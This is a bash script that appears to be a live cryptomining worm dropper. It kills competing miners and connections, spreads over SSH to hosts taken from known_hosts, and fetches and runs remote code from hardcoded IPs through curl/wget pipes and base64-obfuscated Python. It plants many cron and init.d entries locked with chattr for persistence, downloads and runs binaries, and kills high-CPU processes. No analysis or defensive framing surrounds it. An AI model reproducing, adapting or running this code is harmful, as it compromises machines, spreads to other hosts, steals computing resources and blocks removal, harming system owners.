#!/bin/bash
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '23.94.24.12:8080'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
netstat -antp | grep '134.122.17.13:8080'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
netstat -antp | grep '107.189.11.170:443'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
if [ -s /usr/bin/ifconfig ];
then
	range=$(ifconfig | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)
else
	range=$(ip a | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 | grep -v 255 | head -n1)
fi

if [ $(ping -c 1 pool.supportxmr.com 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
then
        dns=""
else
        dns="-d"
fi

payload='(curl -fsSL http://205.185.113.151/xmi||wget -q -O- http://205.185.113.151/xmi)|bash -sh; echo "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZC5weSIpLnJlYWQoKSkn" | base64 -d | bash -'
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts)
  do
	ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h $payload
  done
fi

usersshdir="/home/"`whoami`"/.ssh/known_hosts"
usersshdir2="/home/"`whoami`"/.ssh/known_hosts"
if [ -f $usersshdir ] && [ -f $usersshdir2 ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts)
  do
	ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h $payload
  done
fi


echo -e "*/1 * * * * root (curl -s http://205.185.113.151/xmi||wget -q -O - http://205.185.113.151/xmi)|bash -sh; echo "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZC5weSIpLnJlYWQoKSkn" | base64 -d | bash -; lwp-download http://205.185.113.151/xmi /tmp/xmi; bash /tmp/xmi\n##" > /etc/cron.d/root
echo -e "*/2 * * * * root (curl -s http://205.185.113.151/xmi||wget -q -O - http://205.185.113.151/xmi)|bash -sh; echo "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZC5weSIpLnJlYWQoKSkn" | base64 -d | bash -; lwp-download http://205.185.113.151/xmi /tmp/xmi; bash /tmp/xmi\n##" > /etc/cron.d/apache
echo -e "*/3 * * * * root lwp-download http://205.185.113.151/xmi /tmp/.xo; bash /tmp/.xo; rm -rf /tmp.xo\n##" > /etc/cron.d/nginx
echo -e "*/30 * * * *	(curl -s http://205.185.113.151/xmi||wget -q -O - http://205.185.113.151/xmi)|bash -sh; echo "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZC5weSIpLnJlYWQoKSkn" | base64 -d | bash -; lwp-download http://205.185.113.151/xmi /tmp/xmi; bash /tmp/xmi\n##" > /var/spool/cron/root
echo "IyEvYmluL2Jhc2gKCmVjaG8gLWUgJyMhL2Jpbi9iYXNoCiMjIyBCRUdJTiBJTklUIElORk8KIyBQcm92aWRlczogICAgICAgICAgZG93bgojIFJlcXVpcmVkLVN0YXJ0OgojIFJlcXVpcmVkLVN0b3A6CiMgRGVmYXVsdC1TdGFydDogICAgIDIgMyA0IDUKIyBEZWZhdWx0LVN0b3A6CiMgU2hvcnQtRGVzY3JpcHRpb246IGRvd24gKGJ5IHB3bmVkKQojIyMgRU5EIElOSVQgSU5GTwooY3VybCAtZnNTTCBodHRwOi8vMjA1LjE4NS4xMTMuMTUxL3htaXx8d2dldCAtcSAtTy0gaHR0cDovLzIwNS4xODUuMTEzLjE1MS94bWkpfGJhc2ggLXNoOyBlY2hvICJjSGwwYUc5dUlDMWpJQ2RwYlhCdmNuUWdkWEpzYkdsaU8yVjRaV01vZFhKc2JHbGlMblZ5Ykc5d1pXNG9JbWgwZEhBNkx5OHlNRFV1TVRnMUxqRXhNeTR4TlRFdlpDNXdlU0lwTG5KbFlXUW9LU2tuIiB8IGJhc2U2NCAtZCB8IGJhc2ggLScgPiAvZXRjL2luaXQuZC9kb3du" | base64 -d | bash -
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * *	(curl -s http://205.185.113.151/xmi||wget -q -O - http://205.185.113.151/xmi)|bash -sh; echo "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZC5weSIpLnJlYWQoKSkn" | base64 -d | bash -; lwp-download http://205.185.113.151/xmi /tmp/xmi; bash /tmp/xmi##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
echo '(curl -fsSL http://205.185.113.151/xmi||wget -q -O- http://205.185.113.151/xmi)|bash -sh; echo "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZC5weSIpLnJlYWQoKSkn" | base64 -d | bash -; lwp-download http://205.185.113.151/xmi /tmp/xmi; bash /tmp/xmi' > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
chattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
DIR="/tmp"
cd $DIR

if [ -a "/tmp/.sh/x86_64" ]
then
    if [ -w "/tmp/.sh/x86_64" ] && [ ! -d "/tmp/.sh/x86_64" ]
    then
        if [ -x "$(command -v md5sum)" ]
        then
            sum=$(md5sum /tmp/.sh/x86_64 | awk '{ print $1 }')
            echo $sum
            case $sum in
                34d793cb139225a4c175a7c29bb16be5 | 34d793cb139225a4c175a7c29bb16be5)
                    echo "x86_64 OK"
                ;;
                *)
                    echo "x86_64 wrong"
                    rm -rf /usr/local/lib/libkk.so
                    echo "" > /etc/ld.so.preload
                    pkill -f wc.conf
                    pkill -f susss
                    sleep 4
                ;;
            esac
        fi
        echo "P OK"
    else
        DIR=$(mktemp -d)/tmp
        mkdir $DIR
        echo "T DIR $DIR"
    fi
else
    if [ -d "/tmp" ]
    then
        DIR="/tmp"
    fi
    echo "P NOT EXISTS"
fi
if [ -d "/tmp/.sh/x86_64" ]
then
    DIR=$(mktemp -d)/tmp
    mkdir $DIR
    echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
    WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
    WGET="wget -O";
fi
if [ -s /usr/bin/wget2 ];
then
    WGET="wget2 -O";
fi
if [ -s /usr/bin/curl2 ];
then
    WGET="curl2 -o";
fi

f2="205.185.113.151"

downloadIfNeed()
{
    if [ -x "$(command -v md5sum)" ]
    then
        if [ ! -f $DIR/x86_64 ]; then
            echo "File not found!"
            download
        fi
        sum=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
        echo $sum
        case $sum in
            34d793cb139225a4c175a7c29bb16be5 | 34d793cb139225a4c175a7c29bb16be5)
                echo "x86_64 OK"
            ;;
            *)
                echo "sssus wrong"
                sizeBefore=$(du $DIR/x86_64)
                if [ -s /usr/bin/curl ];
                then
                    WGET="curl -k -o ";
                fi
                if [ -s /usr/bin/wget ];
                then
                    WGET="wget --no-check-certificate -O ";
                fi
                download
                sumAfter=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
                if [ -s /usr/bin/curl ];
                then
                    echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sssus` > $DIR/tmp.txt
                fi
            ;;
        esac
    else
        echo "No md5sum"
        download
    fi
}


download() {
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/x86_643 | awk '{ print $1 }')
        echo $sum
        case $sum in
            34d793cb139225a4c175a7c29bb16be5 | 34d793cb139225a4c175a7c29bb16be5)
                echo "x86_64 OK"
                cp $DIR/x86_643 $DIR/x86_64
				        cp $DIR/x86_643 $DIR/x86_64
            ;;
            *)
                echo "x86_64 wrong"
                download2
            ;;
        esac
    else
        echo "No md5sum"
        download2
    fi
}

download2() {
    if [ `getconf LONG_BIT` = "64" ]
    then
	$WGET "$DIR"/x86_64 http://209.141.61.233/x86_64
	$WGET "$DIR"/i686 http://209.141.33.226/i686
	$WGET "$DIR"/go http://205.185.113.151/go
	lwp-download http://209.141.61.233/x86_64 "$DIR"/x86_64
	lwp-download http://209.141.33.226/i686 "$DIR"/i686
	lwp-download http://205.185.113.151/go "$DIR"/go
    else
	$WGET "$DIR"/x86_64 http://209.141.61.233/x86_64
	$WGET "$DIR"/i686 http://209.141.33.226/i686
	$WGET "$DIR"/go http://205.185.113.151/go
	lwp-download http://209.141.61.233/x86_64 "$DIR"/x86_64
	lwp-download http://209.141.33.226/i686 "$DIR"/i686
	lwp-download http://205.185.113.151/go "$DIR"/go
    fi
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
        echo $sum
        case $sum in
            34d793cb139225a4c175a7c29bb16be5 | 34d793cb139225a4c175a7c29bb16be5)
                echo "x86_64 OK"
                cp $DIR/x86_64 $DIR/x86_643
            ;;
            *)
                echo "x86_64 wrong"
            ;;
        esac
    else
        echo "No md5sum"
    fi
}

judge() {
    if [ ! "$(netstat -ant|grep '37.139.10.55:8080\|185.141.25.115:8080\|68.183.224.58:8080'|grep 'ESTABLISHED'|grep -v grep)" ];
    then
        ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid
	      do
	      kill -9 $procid
        done
        downloadIfNeed
        rm -rf /usr/local/lib/libkk.so
	$WGET "$DIR"/x86_64 http://209.141.61.233/x86_64
	$WGET "$DIR"/i686 http://209.141.33.226/i686
	$WGET "$DIR"/go http://205.185.113.151/go
	lwp-download http://209.141.61.233/x86_64 "$DIR"/x86_64
	lwp-download http://209.141.33.226/i686 "$DIR"/i686
	lwp-download http://205.185.113.151/go "$DIR"/go
	chmod +x $DIR/i686
        chmod +x $DIR/x86_64
	chmod +x $DIR/go
        $DIR/go
	echo "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZC5weSIpLnJlYWQoKSkn" | base64 -d | bash -
	chattr +i -V $DIR/dbused	
        sleep 5
    else
	echo "Running"
    fi
}

judge2() {
    if [ ! "$(ps -fe|grep -e 'dbused'|grep -v grep)" ];
    then
        downloadIfNeed
	lwp-download http://209.141.61.233/x86_64 "$DIR"/x86_64
	lwp-download http://209.141.33.226/i686 "$DIR"/i686
	lwp-download http://205.185.113.151/go "$DIR"/go
	chmod +x $DIR/i686
        chmod +x $DIR/x86_64
	chmod +x $DIR/go
        $DIR/go
	echo "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZC5weSIpLnJlYWQoKSkn" | base64 -d | bash -
	chattr +i -V $DIR/dbused
        sleep 5
    else
	echo "Running"
    fi
}

if [ ! "$(netstat -ant|grep '37.139.10.55:8080\|185.141.25.115:8080\|68.183.224.58:8080'|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
then
    judge
else
    judge2
fi

if [ ! "$(netstat -ant|grep '104.244.75.25:443'|grep 'ESTABLISHED'|grep -v grep)" ];
then
     if [ `getconf LONG_BIT` = "64" ]
	then
    		$WGET "$DIR"/x64b http://205.185.113.151/x64b
    		lwp-download http://205.185.113.151/x64b "$DIR"/x64b
    		chmod 777 "$DIR"/x64b
    		"$DIR"/x64b
     	else
    		$WGET "$DIR"/x32b http://205.185.113.151/x32b
    		lwp-download http://205.185.113.151/x32b "$DIR"/x32b
    		chmod 777 "$DIR"/x32b
    		"$DIR"/x32b
	fi
else
	echo "running"
fi

#if [ ! "$(ps -fe|grep -e 'hxx\|scan\|masscan'|grep -v grep)" ];
#then
#	if [[ $EUID -ne 0 ]];
#		then
#			echo "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZi5weSIpLnJlYWQoKSkn" | base64 -d | bash -
#		else
#			echo "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZmYucHkiKS5yZWFkKCkpJw==" | base64 -d | bash -
#	fi
#else
#    echo "Bruting"
#fi


if crontab -l | grep -q "205.185.113.151\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZC5weSIpLnJlYWQoKSkn"
then
    echo "Cron exists"
else
    crontab -r
    echo "Cron not found"
    echo '* * * * * (curl -s http://205.185.113.151/xmi||wget -q -O - http://205.185.113.151/xmi)|bash -sh; echo "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZC5weSIpLnJlYWQoKSkn" | base64 -d | bash -; lwp-download http://205.185.113.151/xmi /tmp/xmi; bash /tmp/xmi' | crontab -
fi

rm -rf "$DIR"/2start.jpg
rm -rf "$DIR"/xmi